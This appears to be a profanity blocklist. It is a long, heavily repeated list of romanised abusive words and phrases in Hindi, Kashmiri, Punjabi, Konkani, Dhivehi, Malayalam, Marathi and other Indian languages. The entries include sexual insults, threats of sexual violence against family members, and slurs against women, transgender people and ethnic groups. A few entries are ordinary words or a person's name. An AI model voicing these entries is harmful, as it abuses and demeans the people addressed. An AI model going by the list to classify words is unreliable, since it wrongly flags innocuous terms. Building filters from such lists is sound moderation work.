jhaatu
jhatu
jhatoo
chussar
chup b bhosdike
bhosdi ke
bhosdi
maa ke lodey..
gand marao
behanchod
bhossdi k
maakilaudi
muth marke soja
muth marka soja
muth mar ke so ja
muth maar
boka choda
bhosdike
bakchod
backcgod
brest
cleavage
chudna
phudi
cutyiye
pennis
chu.t
backchod
hot clevage
clevage
gand
bhosadiwaale
bokachoda
nice cleavage
jhat
thode daba do
bosid***ke
band kar lav**d
bhaag bhanchode
bhanchode
baag bachod ladki
bachod
cu**t
ch****ye
ban**chid
chu chu
bachchod
ga**ndo
machudao
chuchi
teri maa ki ***
chusss le
chu
chuu
b*nch*d*
cutiye
bosidike
boooooobbbbbssss
muh mae le
bakchodi
bh*sdike
raan*s
lole
bhdve
bahan ki chuat
maadr chaad
ga**nd
ga**
chuchu
chusaa hua
bosidike
teri maa ka saaki
f***ing
f***off
chup mc
bhosdiwaale
bhosdikee
aaand mat kaha
aand mat kaha
aandal
aandu
aandupana
abla naari tera buble bhaari
amma ki chut
andh
apna land choos
apna lund choos
apna ma ko ja choos
apni gaand mein muthi daal
apni land choos
apni lund choos
apni ma ko ja choos
asal ka chuda
baap ke lavde
backar chodu
backarchodu
backchod
badeer
badir
badirchand
bahen chod
bahen ka loda
bahen ke laude
bahen ke takke
bahenchod
bahinchod
bahu chod
bakchod
bakchod billi
bakland
baklol
baklund
bakri chod
bakrichod
balatkaar
banchod
bc
behan chod
behen chod
behen ka laura
behen ke land
behen ke laude
behen ke lawde
behen ke lund
behen ke take
behenchod
behenkelaude
behnchod
benchod
beti chod
betichod
bhaand me jaao
bhadhava
bhadva chodika
bhadwa
bhadwe
bhadwe ka awlat
bhadwe ki nasal
bhag bhosdike
bhai chhod bhayee chod
bhai chod
bhainchod
bhains ki aulad
bhais ke lund
bhais ki poonch
bhand khau
bhandava
bhandwe ki aulad
bhen chhod bhaynchod
bhen chod
bhen di fuddi
bhen ke laude
bhen ke lode
bhen ke lode maa chuda
bhen ke takke
bhen ki choot
bhencho
bhenchod
bhodhsike
bhonsriwaalaa
bhootnee ka
bhootnik
bhosad chod
bhosad raand
bhosadchod
bhosadi k
bhosadi ke
bhosadike
bhosadiwala
bhosda
bhosdaa
bhosdee kay
bhosdi
bhosdi k
bhosdi ka
bhosdi kalam
bhosdi ke
bhosdi wala
bhosdi wale
bhosdik
bhosdika
bhosdike
bhosdivaale
bhosdiwala
bhosdiwale
bhundi
bokachoda
bol teri gand kaise maru
booblay
boor
bsdk
buddha khoosat
buhtahnee ka
bulle ke baal
bumchod
bund
bund maraa le
bur
bur ka choda
bur ki chatani
burr
burr ke baal
bursungha
camina
cha cha chod
chachunder ki aulad
chhola phudakna
chhut ka baal
chinaal
chinaal ke gadde ke nipple ke baal ke joon
chinal
chipkai ki choot ke paseene
chipkali ke chut ke pasine
chipkali ke gaand ke pasine
chipkali ke jhaat ke baal
chipkali ke jhaat ke paseene
chipkali ki bhigi chut
chippkali ke jhaant ke paseene
chod ke bal ka kida
chodela
chodu bhagat
chooche
choochi
choochii
chood
choodasi
choodpagal
choohe ki moot
choot k bhoot
choot k pakode
choot ka baal
choot ka paani
choot ka pissu
choot ke bhoot
choot ke bhoot vaginal ghost
choot ki jhilli
choot marani ka
chootad
chootadchod
chootia
chootiya
chootiyapanti
chopre he randi
chudaai
chudaai khaana
chudaai khaani
chudai khana
chudail
chudan chudai
chudase
chudasi
chude
chudi
chudpagal
chudwana
chull uthna
chullu bhar muth mein doob mar
chup ke chut hai
chusnawala
chusnawali
chut
chut k dher
chut ka bhoot
chut ka maindak
chut ka nai
chut ka pujari
chut karo
chut ke baal
chut ke dhakkan
chut ke gulam
chut ke makkhan
chut ke pakode
chut ke pasine mein talay huye bhajiye
chut khujaane vaali
chut ki andhi
chut ki pyasi
chut mari ke
chut marike
chut se latka hua laude ka moot
chutan
chute
chutia
chutiya
chutiya chootia
chutiya ka bheja ghas khane gaya hai
chutiyah
chutiye
chuttad
chuttad chod
cuntmama
cutlkat lund
dalli
dhee chod
dhee ka lund
dheela lund
dheeli choot
dheli chut
dogla
fatay huay lundtopi ka
fatay huay lundtopi ka result
fate condom ka natije
fatey condom kay natije
fuddi
fudii k
gaand
gaand chaat mera
gaand gaand
gaand k baal
gaand ka baal
gaand ka khadda
gaand ka makhan
gaand ka pilla
gaand ke dhakan
gaand ki aulaad
gaand maar bhen chod
gaand maarna
gaand main danda
gaand main keera
gaand main lassan
gaand mara
gaand marau
gaand marna
gaand mein bambu
gaand mein kida
gaandfat
gaandkate kutte
gaandmasti
gaandu
gadha
gand mein danda
gand mein louda
gandi chut mein sadta hua ganda kida
gandi fuddi ki gandi auladd
gandkate kutte
gandmare
gandmasti
gandu
gandu saala
gandue
gashti
gastee
gasti
ghassad
ghasti
ghelchodia
ghondoo
gote
gote kitne bhi bade ho lund ke niche hi rehte hai
goti muh mein hai
gundmaraa
gundmari
hamari le rahe hai
haraam ka chuda
haraam ki chudi
haraam zaada
haraami
haraamjaada
haraamjaadi
haraamkhor
haram zaadaa
harami
harami ke pille
haramkhor
haramzaada
haramzade
harazyaada
havas
hazaar lund teri gaand main
hijdaa
hijde
hijra
hrami
hugna
hugnaa
jab tu paida hua tho aagey se ya peechey se nikla tha chutiya
jab tu paida hua tow aagey se ya peechey se nikla tha chutiya
janam jala
janam jali
januwar
janwar
jhaant
jhaant ka baal
jhaant ke jhature
jhaant ke pissu
jhaant ukhaadna
jhaat
jhaat chaatu
jhaat ka bhaaji
jhaat ke baal
jhaatoon saala
jhaatu
jhad jaana
jhandu
jhant chaatu
jhant ke baal
jhantu
jhat ke baal
jhat lahergaya
jhatoo
jhund
joo ke hagge
kaala lund
kaali kutti
kadak maal
kahe ko kha raha hai chut ki chapati aur lund ka beja?
kali choot ke safaid jhaat
kali chut ka safaid jhaat
kamina
kamine
kaminee
kaminey
katla
khade lund pe dhoka
khasmanu khaani
khota
khotey ki aulad
khotey ki aulda
khujju
klpd
kukarchod
kutchudi
kutha
kutha sala
kuthi
kuthri
kuthta buraanahe kandaa nahi pattaahe
kutiya
kutiya ke pilley
kutiyaa
kutta
kutte
kutte ka aulad
kutte ka awlat
kutte ka bachha
kutte ka beej
kutte ka lund
kutte ke aulaad
kutte ke pilley
kutte ke poot
kutte ke tatte
kutte ki aulad
kutte ki jat
kutte ki olad
kutti
kuttiya
kya kadak hai ye
kya maal hai ye
ladkichod
land ka bheja
landait
landue
landure
lauda
laudap
laude
laude ke baal
laude sale
lavda
lavde
lavde ka baal
lavde ke baal
lavde ke bal
lawda
lawde
lo mera lund anpi behen ko de do agar khud na chod paya
lo mera lund apni behen ko de do agar khud na chod paya
loda
lode jesi shakal ke
lode ke baal
lodey jaise shakal teri
lodu
loduu
londiyachod
lowde ka bal
lund
lund choosu
lund chus
lund chuse
lund fakeer
lund fakir
lund fekh ke maroonga toh tera poora khandan chud jayega chutmarike
lund k laddu
lund ka baal
lund ka bheja
lund ka shorba
lund ke pasine
lund khajoor
lund luhnd
lund mera muh tera
lund pe chad ja
lund pe thand hai
lund phek ke marenge khandan chud jayega
lundfakir
lundoos
ma chudi
maa chudaa
maa ka lauda
maa ke bable
maa ke bhadve
maa ke bhadwe
maa ke laude
maa ki aankh
maa ki choot
maa ki chut
maacho
maachod
maachodh
maadar chowd
maadarchod
maadher chod
maakelaude
maal
maal chhodna
maarey hue chipkili ki unday
machod
machodh
madar chod
madar jaat
madarchod
madarchod ke aulaad
madarchodh
madarjat
mader chod
madharchod
maha gaandu
mahder chod
mahderchod
mai chod
maichod
mamme
mammey mummaye
mangachinamun
mast maal
mc
mein teri maa ko liya tha uski suhaag raat pei
mein teri maa ko teri bahen ki choot mein chodoonga aur tera baap laltern lekar aayega
mein teri maa ko teri bhen ki choot mein chodoonga aur tera baap laltern lekar aayega
mera chunni choos
mera ganna mere dil se bada hai
mera gota moo may lay
mera lund choos
mera lungi me havas ki aag lagi hai
mera muhme le
mera mume le
mere chuus maro
mere fudi kha ley
mere pass nile rang ke gend hai
meri gand ka baal
meri gand ka khatmal
meri ghand ka baal
meri lund choos
meri lundh choos
mome ka pasina chat
moo may lay mera
moot
mooth marna
mootna
mu c waale
mujhe aap ki chut chahiye
mujhe aap ko chodna hai
mujhe aap ko thokna hai
mujhe chodne ki bhukh hai
mujhe chut chahiye
mujhe chut marni hai
mujhe ko chodna hai
mujhe tumhe chodna
mujhe tumhe thokna
mujhe usko chodna hai
mutar
muth maar
muth mar
muth marna
mutth marna
mutthal
na choot na chooche nakhre noor jahan ke
naali ka keeda
najayaz
najayaz paidaish
paagal choda
paagalchoda
parichod
phatele nirodh ke natije
phuddi
pig ki tatti
pille
raand
raand codha
raand ka jamai
raand ka pati
raand whore
raandi baajer
rakhail
rand
rand chod
rand ki moot
randawa
randhwa
randi
randi baj
randi chod
randi ka bachcha
randi ka choda
randi ka larka
randi ke baal
randi ke bacche
randi ke beej
randi ke dalal
randi ke jhaant ke toote hue baal
randi ki aulaad
randi ki aulad
randi ki chut
randuaa
randwa
randwe
rubber bhosda
rundee
rundi
rundi apni chut leka ana
rundi ka bacha
rundi ke tatti pe biathne wala makhi
rundi khana
rundi ki bachi
rundi ki tatti pe baithne waali makkhi
rundi ki tatti pe baithnewaali makkhi
rundi ko chod
rundi ko choud
rundi ko chowd
saala
saala betichod
saala kutta
saale
saali kutti
sab ka lund teri ma ki chut mein
sadi hui gaand
sadi hui gand
sala
sala kuttaa
sale
sali kuta
sali kutti
sardar fuda singh
seal bund
sewwer ki bachi
shali
sooar
soover
soower ki bachi
suar
suar ki tatti
sust lund ki padaish
suvar chod
suwar ki aulad
suwwar
suwwar ka bachcha
suwwar ke lund
suwwar ki bachchi
suwwariya
suyar ke baacho
tatte masalna
tatti tatte masalna
tei maa ki gaand me bhi
tera baap ki chut aur maa ke laude
tere adha nirodh mein rah gaya
tere baap ki chut mai teri maa ka land
tere baap ki gaand teri chute mai chuglee
tere gaand mein keede paday
tere maa ka bur
tere maa ko sau kutte chode sau wa tera baap!
tere maa ko sau kutte chode – sau wa tera baap
tere mai ki chut baap teri maa ka land
terey baad di gaand wich danda ghussa ker rakh dhungi
terey baad di gaand wich dhanda gussa ker rakdhungi
teri behen ka bhosda faadu
teri behen ka lauda rubber ka
teri behen ka launda rubber ka
teri behen ka lavda rubber ka
teri bhen ki gaand me ungli karunga
teri bhosri mein aag
teri biwiko teri saamne chodhunga
teri biwiko theri saamne chodhunga
teri gaand main kute ka lund
teri gaand me danda
teri gaand mein haathi ka lund
teri gand mai ghadhe ka lund
teri gand mein haathi ka lund
teri jhanten kaat kar tere mooh par laga kar unki french beard bana doonga
teri ma chadha ka lund choos
teri ma gadha ka lund choos
teri ma gandi rundi
teri ma ki budh mein chaarpai bichhake teri bahen ko chodun
teri ma ki bund mein chaarpai bichhake teri bhen ko chodun
teri ma ki choot me hathi ka dum
teri ma ki chut mai sabka lund
teri ma ko kutta chode
teri maa ka
teri maa ka bhosda
teri maa ka bhosra
teri maa ka boba chusu
teri maa ke bable
teri maa ke bhosade ke baal
teri maa ke bobe kha jaunga bhosdi ke
teri maa ki bimaar badboodar choot
teri maa ki choot
teri maa ki choot me hathi ka dum
lavda
teri maa ki chute
phudi
teri maa ko chodun
chodun
choot
tharki
theri biwi ko tere saamne chodhunga
toota hua lund
tor mai ke chodho
tu tera maa ka lauda
tum chutiya ho
ulloo choda
ulloo ka patthaa
ullu ke pathe
aand
aaand
aandu
bakchod
balatkar
bc
beti chod
bhadva
bhadve
bhandve
bhootni ke
bhosad
bhosadi ke
bhosda
boobe
chakke
chinaal
chinki
chod
chodu
chodu bhagat
chooche
choochi
choot
choot ke baal
chootia
chootiya
chuche
chuchi
chudai khanaa
chudan chudai
chut
chut ke baal
chut ke dhakkan
chut maarli
chutad
chutadd
chutan
chutia
chutiya
gaand
gaandfat
gaandmasti
gaandufad
gandu
gashti
gasti
ghassa
ghasti
hagga
harami
haramzade
hawas
hawas ke pujari
hijda
hijra
jhant
jhant chaatu
jhant ke baal
jhantu
kamine
kaminey
kanjar
kutta
kutta kamina
kutte ki aulad
kutte ki jat
kuttiya
loda
lodu
lund
lund choos
lund khajoor
lundtopi
lundure
maa ki chut
maal
mc
madar chod
mooh mein le
mutth
najayaz
najayaz aulaad
najayaz paidaish
paki
raand
randi
saala
saala kutta
saali kutti
saali randi
suar
suar ki aulad
tatte
tatti
teri maa ka bhosada
teri maa ka boba chusu
teri maa ki chut
tharak
tharki
madrchod
bhnchod
aaand mat kaha
aand mat kaha
aandal
aandu
aandupana
abla naari tera buble bhaari
amma ki chut
andh
apna land choos
apna lund choos
apna ma ko ja choos
apni gaand mein muthi daal
apni land choos
apni lund choos
apni ma ko ja choos
asal ka chuda
baap ke lavde
backar chodu
backarchodu
back chod
backchod
badeer
badir
badirchand
bahen chod
bahen ka loda
bahen ke laude
bahen ke takke
bahenchod
bahinchod
bahu chod
bakchod
bakchod billi
bakland
baklol
baklund
bakri chod
bakrichod
behen chod
behen ka laura
behen ke land
behen ke laude
behen ke lawde
behen ke lund
behen ke take
behenchod
behenkelaude
behnchod
benchod
beti chod
betichod
bhaand me jaao
bhadhava
bhadva chodika
bhadwa
bhadwe
bhadwe ka awlat
bhadwe ki nasal
bhag bhosdike
bhai chhod bhayee chod
bhai chod
bhainchod
bhais ke lund
bhandava
bhen chod
bhen ke laude
bhen ke lode
bhen ke lode maa chuda
bhen ke takke
bhen ki choot
bhencho
bhenchod
bhodhsike
bhonsriwaalaa
bhootnee ka
bhootnik
bhosad chod
bhosad raand
bhosadchod
bhosadi k
bhosadi ke
bhosadike
bhosadiwala
bhosda
bhosdaa
bhosdee kay
bhosdi
bhosdi k
bhosdi ka
bhosdi kalam
bhosdi ke
bhosdi wala
bhosdi wale
bhosdik
bhosdika
bhosdike
bhosdivaale
bhosdiwala
bhosdiwale
bhundi
bokachoda
bol teri gand kaise maru
booblay
boor
bsdk
buddha khoosat
buhtahnee ka
bulle ke baal
bumchod
bund
bund maraa le
bur
bur ka choda
bur ki chatani
burr
burr ke baal
bursungha
camina
cha cha chod
chachunder ki aulad
chhola phudakna
chhut ka baal
chinaal
chinaal ke gadde ke nipple ke baal ke joon
chinal
chipkai ki choot ke paseene
chipkali ke chut ke pasine
chipkali ke gaand ke pasine
chipkali ke jhaat ke baal
chipkali ke jhaat ke paseene
chipkali ki bhigi chut
chippkali ke jhaant ke paseene
chod ke bal ka kida
chodela
chodu bhagat
chooche
choochi
choochii
chood
choodasi
choodpagal
choohe ki moot
choot k bhoot
choot k pakode
choot ka baal
choot ka paani
choot ka pissu
choot ke bhoot
choot ke bhoot vaginal ghost
choot ki jhilli
choot marani ka
chootad
chootadchod
chootia
chootiya
chootiyapanti
chopre he randi
chudaai
chudaai khaana
chudaai khaani
chudai khana
chudail
chudan chudai
chudase
chudasi
chude
chudi
chudpagal
chudwana
chull uthna
chullu bhar muth mein doob mar
chup ke chut hai
chusnawala
chusnawali
chut
chut k dher
chut ka bhoot
chut ka maindak
chut ka nai
chut ka pujari
chut karo
chut ke baal
chut ke dhakkan
chut ke gulam
chut ke makkhan
chut ke pakode
chut ke pasine mein talay huye bhajiye
chut khujaane vaali
chut ki andhi
chut ki pyasi
chut mari ke
chut marike
chut se latka hua laude ka moot
chutan
chute
chutia
chutiya
chutiya chootia
chutiya ka bheja ghas khane gaya hai
chutiyah
chutiye
chuttad
chuttad chod
cuntmama
cutlkat lund
dalli
dhee chod
dhee ka lund
dheela lund
dheeli choot
dheli chut
dogla
fatay huay lundtopi ka
fatay huay lundtopi ka result
fate condom ka natije
fatey condom kay natije
fuddi
fudii k
gaand
gaand chaat mera
gaand gaand
gaand k baal
gaand ka baal
gaand ka khadda
gaand ka makhan
gaand ka pilla
gaand ke dhakan
gaand ki aulaad
gaand maar bhen chod
gaand maarna
gaand main danda
gaand main keera
gaand main lassan
gaand mara
gaand marau
gaand marna
gaand mein bambu
gaand mein kida
gaandfat
gaandkate kutte
gaandmasti
gaandu
gadha
gand mein danda
gand mein louda
gandi chut mein sadta hua ganda kida
gandi fuddi ki gandi auladd
gandkate kutte
gandmare
gandmasti
gandu
gandu saala
gandue
gashti
gastee
gasti
ghassad
ghasti
ghelchodia
ghondoo
gote
gote kitne bhi bade ho lund ke niche hi rehte hai
goti muh mein hai
gundmaraa
gundmari
hamari le rahe hai
haraam ka chuda
haraam ki chudi
haraam zaada
haraami
haraamjaada
haraamjaadi
haraamkhor
haram zaadaa
harami
harami ke pille
haramkhor
haramzaada
haramzade
harazyaada
havas
hazaar lund teri gaand main
hijdaa
hijde
hijra
hrami
hugna
hugnaa
jab tu paida hua tho aagey se ya peechey se nikla tha chutiya
jab tu paida hua tow aagey se ya peechey se nikla tha chutiya
janam jala
janam jali
januwar
janwar
jhaant
jhaant ka baal
jhaant ke jhature
jhaant ke pissu
jhaant ukhaadna
jhaat
jhaat chaatu
jhaat ka bhaaji
jhaat ke baal
jhaatoon saala
jhaatu
jhandu
jhant chaatu
jhant ke baal
jhat ke baal
jhat lahergaya
jhatoo
jhund
joo ke hagge
kaala lund
kaali kutti
kadak maal
kahe ko kha raha hai chut ki chapati aur lund ka beja?
kali choot ke safaid jhaat
kali chut ka safaid jhaat
kamina
kamine
kaminee
kaminey
katla
khade lund pe dhoka
khasmanu khaani
khota
khotey ki aulad
khotey ki aulda
khujju
klpd
kukarchod
kutchudi
kutha
kutha sala
kuthi
kuthri
kuthta buraanahe kandaa nahi pattaahe
kutiya
kutiya ke pilley
kutiyaa
kutta
kutte
kutte ka aulad
kutte ka awlat
kutte ka bachha
kutte ka beej
kutte ka lund
kutte ke aulaad
kutte ke pilley
kutte ke poot
kutte ke tatte
kutte ki aulad
kutte ki jat
kutte ki olad
kutti
kuttiya
kya kadak hai ye
kya maal hai ye
ladkichod
land ka bheja
landait
landue
landure
lauda
laudap
laude
laude ke baal
laude sale
lavda
lavde
lavde ka baal
lavde ke baal
lavde ke bal
lawda
lawde
lo mera lund anpi behen ko de do agar khud na chod paya
lo mera lund apni behen ko de do agar khud na chod paya
loda
lode jesi shakal ke
lode ke baal
lodey jaise shakal teri
lodu
loduu
londiyachod
lowde ka bal
lund
lund choosu
lund chus
lund chuse
lund fakeer
lund fakir
lund fekh ke maroonga toh tera poora khandan chud jayega chutmarike
lund k laddu
lund ka baal
lund ka bheja
lund ka shorba
lund ke pasine
lund khajoor
lund luhnd
lund mera muh tera
lund pe chad ja
lund pe thand hai
lund phek ke marenge khandan chud jayega
lundfakir
lundoos
ma chudi
maa chudaa
maa ka lauda
maa ke bable
maa ke bhadve
maa ke bhadwe
maa ke laude
maa ki aankh
maa ki choot
maa ki chut
maacho
maachod
maachodh
maadar chowd
maadarchod
maadher chod
maakelaude
maal
maal chhodna
maarey hue chipkili ki unday
machod
machodh
madar chod
madar jaat
madarchod
madarchod ke aulaad
madarchodh
madarjat
mader chod
madharchod
maha gaandu
mahder chod
mahderchod
mai chod
maichod
mamme
mammey mummaye
mangachinamun
mast maal
mc
mein teri maa ko liya tha uski suhaag raat pei
mein teri maa ko teri bahen ki choot mein chodoonga aur tera baap laltern lekar aayega
mein teri maa ko teri bhen ki choot mein chodoonga aur tera baap laltern lekar aayega
mera chunni choos
mera ganna mere dil se bada hai
mera gota moo may lay
mera lund choos
mera lungi me havas ki aag lagi hai
mera muhme le
mera mume le
mere chuus maro
mere fudi kha ley
mere pass nile rang ke gend hai
meri gand ka baal
meri gand ka khatmal
meri ghand ka baal
meri lund choos
meri lundh choos
mome ka pasina chat
moo may lay mera
moot
mooth marna
mootna
mu c waale
mujhe aap ki chut chahiye
mujhe aap ko chodna hai
mujhe aap ko thokna hai
mujhe chodne ki bhukh hai
mujhe chut chahiye
mujhe chut marni hai
mujhe ko chodna hai
mujhe tumhe chodna
mujhe tumhe thokna
mujhe usko chodna hai
mutar
muth maar
muth mar
muth marna
mutth marna
mutthal
na choot na chooche nakhre noor jahan ke
naali ka keeda
najayaz
najayaz paidaish
paagal choda
paagalchoda
parichod
phatele nirodh ke natije
phuddi
pig ki tatti
pille
raand
raand codha
raand ka jamai
raand ka pati
raand whore
raandi baajer
rakhail
rand
rand chod
rand ki moot
randawa
randhwa
randi
randi baj
randi chod
randi ka bachcha
randi ka choda
randi ka larka
randi ke baal
randi ke bacche
randi ke beej
randi ke dalal
randi ke jhaant ke toote hue baal
randi ki aulaad
randi ki aulad
randi ki chut
randuaa
randwa
randwe
rubber bhosda
rundee
rundi
rundi apni chut leka ana
rundi ka bacha
rundi ke tatti pe biathne wala makhi
rundi khana
rundi ki bachi
rundi ki tatti pe baithne waali makkhi
rundi ki tatti pe baithnewaali makkhi
rundi ko chod
rundi ko choud
rundi ko chowd
saala
saala betichod
saala kutta
saale
saali kutti
sab ka lund teri ma ki chut mein
sadi hui gaand
sadi hui gand
sala
sala kuttaa
sale
sali kuta
sali kutti
sardar fuda singh
seal bund
sewwer ki bachi
sooar
soover
soower ki bachi
suar
suar ki tatti
sust lund ki padaish
suvar chod
suwar ki aulad
suwwar
suwwar ka bachcha
suwwar ke lund
suwwar ki bachchi
suwwariya
suyar ke baacho
tatte masalna
tatti tatte masalna
tei maa ki gaand me bhi
tera baap ki chut aur maa ke laude
tere adha nirodh mein rah gaya
tere baap ki chut mai teri maa ka land
tere baap ki gaand teri chute mai chuglee
tere gaand mein keede paday
tere maa ka bur
tere maa ko sau kutte chode sau wa tera baap!
tere maa ko sau kutte chode – sau wa tera baap
tere mai ki chut baap teri maa ka land
terey baad di gaand wich danda ghussa ker rakh dhungi
terey baad di gaand wich dhanda gussa ker rakdhungi
teri behen ka bhosda faadu
teri behen ka lauda rubber ka
teri behen ka launda rubber ka
teri behen ka lavda rubber ka
teri bhen ki gaand me ungli karunga
teri bhosri mein aag
teri biwiko teri saamne chodhunga
teri biwiko theri saamne chodhunga
teri gaand main kute ka lund
teri gaand me danda
teri gaand mein haathi ka lund
teri gand mai ghadhe ka lund
teri gand mein haathi ka lund
teri jhanten kaat kar tere mooh par laga kar unki french beard bana doonga
teri ma chadha ka lund choos
teri ma gadha ka lund choos
teri ma gandi rundi
teri ma ki budh mein chaarpai bichhake teri bahen ko chodun
teri ma ki bund mein chaarpai bichhake teri bhen ko chodun
teri ma ki choot me hathi ka dum
teri ma ki chut mai sabka lund
teri ma ko kutta chode
teri maa ka
teri maa ka bhosda
teri maa ka bhosra
teri maa ka boba chusu
teri maa ke bable
teri maa ke bhosade ke baal
teri maa ke bobe kha jaunga bhosdi ke
teri maa ki bimaar badboodar choot
teri maa ki choot
teri maa ki choot me hathi ka dum
teri maa ki choot me kutte ka lavda
teri maa ki chut
teri maa ki chut mai sabka lund
teri maa ki chut mein chatri leke ghus jaunga aur khol dunga
teri maa ki chute
teri maa ki gaand ki baal mein jalaay hue
teri maa ki gaand ki baal mein jalaay hue maarey hue chupkili ki unday
teri maa ki maari choot
teri maa ki phudi guy ki hai
teri maa ki sukhi bhos
teri maa ko chodun
teri mi di kussi mey tera sarra khandan ko ggussa ker rakhdoungi
teri mi di kussi mey tera sarra khandan ko ghussa ker rakh doonga
teri phuphi ki choot mein
tharki
theri biwi ko tere saamne chodhunga
toota hua lund
tor mai ke chodho
tu tera maa ka lauda
tum chutiya ho
ulloo choda
ulloo ka patthaa
ullu ke pathe
Bewarsi
Mukli muchkondu kutko
Mukli tuth
Rande
Randi magane
Saak thika muchappa
shraddha
Soole Maga
Tulla
Aab
baaz akh de
babba aasus manz choosni
babbe kache chatai
bablyaath
be lakhay beni
beni gooud
Beni lakhai
beyani goood
bh lakhai che
Brahman chaenk
Chaaan
chakij
chakjeh goud
Chapin
che chui mazze lakhnas
Choti travi marchevangan
Chotul
chwath
Dagaddalli maa de bacheio
Dawa woal
diyanawaan
duniyah che khap
Fhalaan
fis
Gaan
gaani bach
Gees
ghain
Gooid prah
Goudi Sawaer
guude
Ha kole madarchoda
Hahra
haramuk
Hasna
Haspataal
houn goudiuk
kani jung
Khade daez
khape chraethe
khapkhap
Kucher
laith
langan dimay darith
lazmai bene
lazmai goudis
Lazmaiye Mael Sinze Kori
Lazmayi babbun
lazmie lyath
Lechmayaa benzi
Lezmaye Lyaath
liyath chani goodis
lyaath
lyath kal
lyathee kale
Lyathh
Ma lakh goudis
maaji gooud
maaji lakhai
maeji guudh
maeji lyaath
maelis lakhai
mambre kalle
Meethir
Momri Kalle
MUAMD
Mumer
Mye kya zok kadkhe
Naer
Pael
phutyaa poon
ponas lakhai
ponas manz chu chout kieom
Ponne Tecczh
Poon
poonus lakhai
rath mein lyath
sa here tok mi haijla
Sabzi woal
Seel tuluai
seous good
Siiech
Sous
Taech
tche che baji bab
thapi karani
Watul
Zakal ponz
Zang
Zinhook
zoake goodh
zok
zokke poan
Zokkk
Gandah kullah pudha
Gandhu
Gandhu bastar
Hanzeer da puthar
Jannay na puthar
Kalayah
Khotah
Khotay da puthar
Kuttah
Kuttay na puthar
Kutthi
Lan choop
Lofar
Mammay
May thara pudha marsah
Nikki lan
Pahari ki aulad
Pudhu goray
Randi na puthar
Yadeenah
Aavoi Zovno
Avoichi/Maichi Fudh
baakri
babak zovnya
Babay Aand
bainik zovnya
bewarshi
Bhikarchot
Bhokan bot
Bokan bot
Chedi
Chedye kastachya
Chedyecho
Chont
Chontli
Colwont
daba daba
Fodo
Fodri
Fuddri
Fude
Gaand
Gadith
ganDi bot gaali
gandi ke bot davari
GanDi votto
Guru
kick your ass
maari
Maichi fud
masti pisso
minni
momme
momo
moshye fudd
muje bonk lew
paadu
Popoot
Potachea
Potnechya
rande puth
Randecho
Shent
shet maar pilluk
sunna manngo
sunne jati che
Tu Zovlo Khubyakarnicha chedvak
Tu Zovlo Khubyakarnik
tugile gaandi
Tujya Baye Fodo
ubyani zhovta
zhenge
Zonyachea
zov babak
Zov Bai
zov rangyak
amaa fui
Amaa fui
Amaa handhaan kurey
amaa thalhaa
Badi
Buri Loa valhu
Fada boe
Fada boey
Fada Thiki
Fatha folhi
magey foah boe
mani boe
Nagoo balhu
nagoobalhu
"Ninde ama, pati!"
Aaana kunna
aan-vedi
achante andi
Achinga Kunnan
adichu poli
Ajoli ka Thajoli
ammaudi pootil poocha
amminhnha
Andi pidiyan
anna kunna
appikunna
arraykku chuttum poorruu ullaval
avaraathi
avarathi mone
chalam nakki
Chandi
Chokka lingam
coondi
Da patti
eli kunna
Ettukali Patti Pooran
inchi mola
johninte andi
kaatu poori
kallel oouuki
kandara oli
kandi
kandi theeni
Kandu
Kanni
Kanni mola
kara vedi
karim kunna
karim pooran
katta thayoli
kazhappu perutha mairan
Keepu
Kettal
kodam nakiii
Kolekkeri
Koothara
Koothi
Koothichi
kotham
kotham kalakki
kotham nakku
Koyimani
kuch
kulamavuka
kundan
kundaroli poori mone
Kundi
Kundi mon
Kundi oota
kundimol
kunji kunnan
kunna
Kunna
kunna chappu
Kunna Oli
Kunna paal
Kunna thayoli
kunna urunji
kunnappal
kushukk
Lick Me
malayalam
Maratel ooki
Masa
Mattanga Poore
Mayiradi mon
Mlechan
mola
moonchikko
Mula Adi
mula chappu
mula kashakku
mula mol
Myir
Myre
Myrru
Naayi meedan
nayinte mone
Nayinte Mone
Nayinte Monne
ninde andi maire
Ninte ama koondi ishtima
Ninte ammakku vettu nayinte mone
Ninte ammaku vetu
ninte ammeda tar
Ninte Ammede Kothil.
ninte ammede pooru
Ninte ammede thenga mairu
ninte appante andi
Odu myre
ookki
oomban
oombi mon
Oooomb
Ootan
paara pooru
paareel ookki
Pacha tayolli
Pachila Pooran
Paik keriko myra
paiku vetti
pala thanthakkundaya thaoli
pallinedayil kanthu
pambara kutichi
pampara thayoli
panchavarna kunna
pandi kallan
panniyoli
para andi oomba
Para kutichi
para thayoli punda mon
parii
pathala poor
patti poori mon
patty theettam
Pela molichi
Pela vedi
pela vedi kandaroli
petty
Pezhachu Pettavan
Poda Thayoli
podda Patti
pola vettu
poochi
Pooranddi
poore ennayil tenni veetil poda
Poori mone
Poorri
Pooru
pooru
Pooru Montha
poottaavi
poottile mathycurry
poyi ninte kunna oombadaa
poyi oombada
praa thayolli
Puchi
pudti puliyadi
Pulayadi monae
pundachi mone
Purusha Vedi
rainayude poore
Santhosh Pandit
Shukla mughan
shuklam dheeni
shuklam nakki
Takkali pooru
Thaayoli
thabala pooran
thakara thayoli
Thallayoli
Thalleyoli
thayolee
thayoli
Thayoli
thayoli idli
Thayoli idli
Theetam
theetta moran
theettam
theettathel ookki
THENGA MYRE
Thenga pooru
Thevadichi
Thokolli kalla sami
Thukal Kunna
umman
vada
Vadam vali
vali
Vayilitto
vedi
vedi pura
vedi vekkuka
Veppatti
veshya / veshi
vettukili
Viral Iduka
vouvalinu undaya thayoli
aai chi gand
Aai ghalya
aai javada
aaichya gavat pay
Aandya
ai zawlee
akkar mashi
Aye Jhaatu
ayica dana
Badak Zawarya
Bhadavya
Bhikaar Chot
Bhosada
Bin gotyaachya
Bulli chokya
Chhaiyla
Chhinal
Chinaal maichya
chinal
chut marichya
Chut Marichya
fodri pisaat
Fodricchya
fokanchidy
Foknicha
Gand khaya
Gand phatli bhenchod
Gandit Ghuslo
Gandoo
Gav Zawadi
Hepari
Jhavadya
Kanadal
khargatya gandicha
Khullya lavdyacchya
lal gandya
Laudu
Lavadya
Lingapisat
madarchod
madarchoth
marathi
Muttha
Paadar Gandichya
pachi bota bhundyat
phodarphatya
Phodree Pisat
Pucchi Khajvya
puchi
Raandichya
Randechya
Shanya lavdyacchya
shata ki chutney
shattya
Shebnya
Telkat Randi
tondaat gay
tujha aila kutryawani zawin
tuji ai mutli madkyat phala-phala
Tuji aiee chi gaand
Tujya aaicha puchha
tuza baap dhandewala
tuzi aai padli madkyat
tuzi aai padli tuzya tondat
tuzua aaichi pucchi viskatli 40 ekrat
Tuzya aai chi Phodree
